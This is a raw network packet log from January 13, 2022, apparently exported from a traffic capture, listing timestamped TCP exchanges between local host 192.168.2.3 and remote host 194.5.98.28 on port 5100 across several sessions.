Jan 13, 2022 15:33:03.569317102 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.569325924 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.569334030 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.569350004 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.569365025 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.569371939 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.569400072 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.569415092 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.569470882 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.569494009 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.569521904 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.569534063 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.569550037 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.569557905 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.569581985 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.569581985 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.569595098 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.569608927 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.569613934 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.569632053 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.569648027 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.569655895 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.569664001 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.569677114 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.569698095 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.569709063 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.569720984 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.569721937 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.569741964 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.569741964 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.569761992 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.569787979 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.569825888 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.569878101 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.569905043 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.569926977 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.569947958 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.569957972 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.569969893 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.569997072 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:07.694026947 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:07.912516117 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:07.912724018 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:07.913373947 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:08.143207073 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:08.143407106 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:08.405571938 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:08.405663013 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:08.622083902 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:08.622165918 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:08.889736891 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:08.889832973 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.157406092 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.157524109 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.194114923 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.194221973 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.194592953 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.194653034 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.194838047 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.194854975 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.194880962 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.194909096 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.412969112 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.412988901 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.413038969 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.413055897 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.413070917 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.413130999 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.413129091 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.413155079 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.413167000 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.413175106 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.413208961 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.413256884 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.413305044 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.629934072 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.630014896 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.630049944 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.630086899 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.630139112 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.630142927 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.630197048 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.630271912 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.630361080 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.630403042 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.630407095 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.630439997 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.630837917 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.630892038 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.630995989 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.631036997 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.631047964 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.631076097 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.631076097 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.631117105 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.631328106 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.631385088 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.631427050 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.631478071 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.631499052 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.631537914 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.631576061 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.631581068 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.631614923 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.781558037 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.848357916 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.848391056 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.848617077 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.848628044 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.848695993 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.848751068 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.848886013 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.848946095 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.849091053 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.849493980 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.849579096 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.849915028 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.849936008 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.850003004 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.850025892 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.850378036 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.850408077 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.850460052 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.850481987 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.850533962 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.850915909 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.850941896 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.850959063 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.850975990 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.850986004 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.850992918 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.851008892 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.851025105 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.851033926 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.851042986 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.851052046 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.851061106 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.851074934 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.851113081 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.852143049 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.852238894 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.852256060 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.852272987 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.852289915 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.852305889 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.852307081 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.852324009 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.852325916 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.852334976 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.852343082 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.852356911 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.852363110 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.852380991 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.852396965 CET	5100	49756	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:09.852401972 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.852427006 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:09.852441072 CET	49756	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:13.940572023 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:14.157145977 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:14.157280922 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:14.158262968 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:14.402065039 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:14.402189970 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:14.670989037 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:14.671103001 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:14.887737036 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:14.887840033 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:15.171144962 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.171214104 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:15.436079025 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.436196089 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:15.472290039 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.472318888 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.472345114 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.472369909 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.472482920 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:15.688729048 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.688777924 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.688904047 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:15.689002991 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.689028978 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.689090014 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:15.689142942 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.689168930 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.689213037 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:15.689517021 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.689721107 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.689723015 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:15.689766884 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:15.906194925 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.906222105 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.906367064 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:15.906454086 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.906474113 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.906522036 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:15.906547070 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.906558037 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:15.906598091 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:15.906788111 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.906810045 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.906864882 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:15.906934023 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:15.907147884 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.907170057 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.907257080 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:15.907433987 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.907458067 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.907486916 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:15.908396006 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.908485889 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:15.909209013 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.909233093 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.909254074 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.909269094 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:15.909286022 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:15.909311056 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:16.048033953 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:16.126436949 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.126467943 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.126488924 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.126876116 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.126884937 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:16.126910925 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.126944065 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:16.126990080 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:16.127031088 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.128925085 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:16.129704952 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.129734039 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.129764080 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:16.129812002 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:16.129900932 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.129925013 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.129980087 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:16.130000114 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.130198956 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.130254030 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:16.130325079 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.130363941 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.130419970 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:16.130518913 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.130573988 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:16.130686045 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.130703926 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.130743980 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:16.130904913 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.130922079 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.130961895 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:16.131232977 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.131458044 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.131475925 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.131489992 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.131505013 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.131536007 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:16.131567955 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:16.131580114 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:16.131582022 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:16.131679058 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.131856918 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.131886005 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.131906986 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:16.131930113 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:16.132087946 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.132249117 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.132266045 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.132503986 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:16.132628918 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.132977009 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.133035898 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:16.133066893 CET	5100	49760	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:16.133132935 CET	49760	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:20.115353107 CET	49791	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:20.332918882 CET	5100	49791	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:20.333271027 CET	49791	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:20.357924938 CET	49791	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:20.597446918 CET	5100	49791	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:20.597589016 CET	49791	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:20.876966000 CET	5100	49791	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:20.877171993 CET	49791	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:21.095210075 CET	5100	49791	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:21.098752975 CET	49791	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:21.375443935 CET	5100	49791	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:21.375525951 CET	49791	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:21.657196999 CET	5100	49791	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:21.657355070 CET	49791	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:21.937560081 CET	5100	49791	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:21.937638998 CET	49791	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:22.203269005 CET	5100	49791	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:22.203387022 CET	49791	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:22.467902899 CET	5100	49791	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:22.469198942 CET	49791	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:22.735999107 CET	5100	49791	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:22.760938883 CET	49791	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:22.766735077 CET	5100	49791	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:22.766805887 CET	5100	49791	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:22.766901970 CET	49791	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:22.772058964 CET	5100	49791	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:22.772105932 CET	5100	49791	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:22.772160053 CET	49791	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:22.772180080 CET	49791	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:27.081450939 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:27.297322989 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:27.304593086 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:27.305156946 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:27.536268950 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:27.536428928 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:27.811301947 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:27.813338041 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:28.031892061 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:28.032668114 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:28.311467886 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:28.312129021 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:28.577346087 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:28.577435017 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:28.604831934 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:28.604927063 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:28.605079889 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:28.605146885 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:28.605514050 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:28.605537891 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:28.605581999 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:28.820862055 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:28.820946932 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:28.821043015 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:28.821099997 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:28.821238995 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:28.821305990 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:28.821306944 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:28.821389914 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:28.821571112 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:28.821691990 CET	49793	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:28.821713924 CET	5100	49793	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:28.821798086 CET	49793	5100	192.168.2.3	194.5.98.28
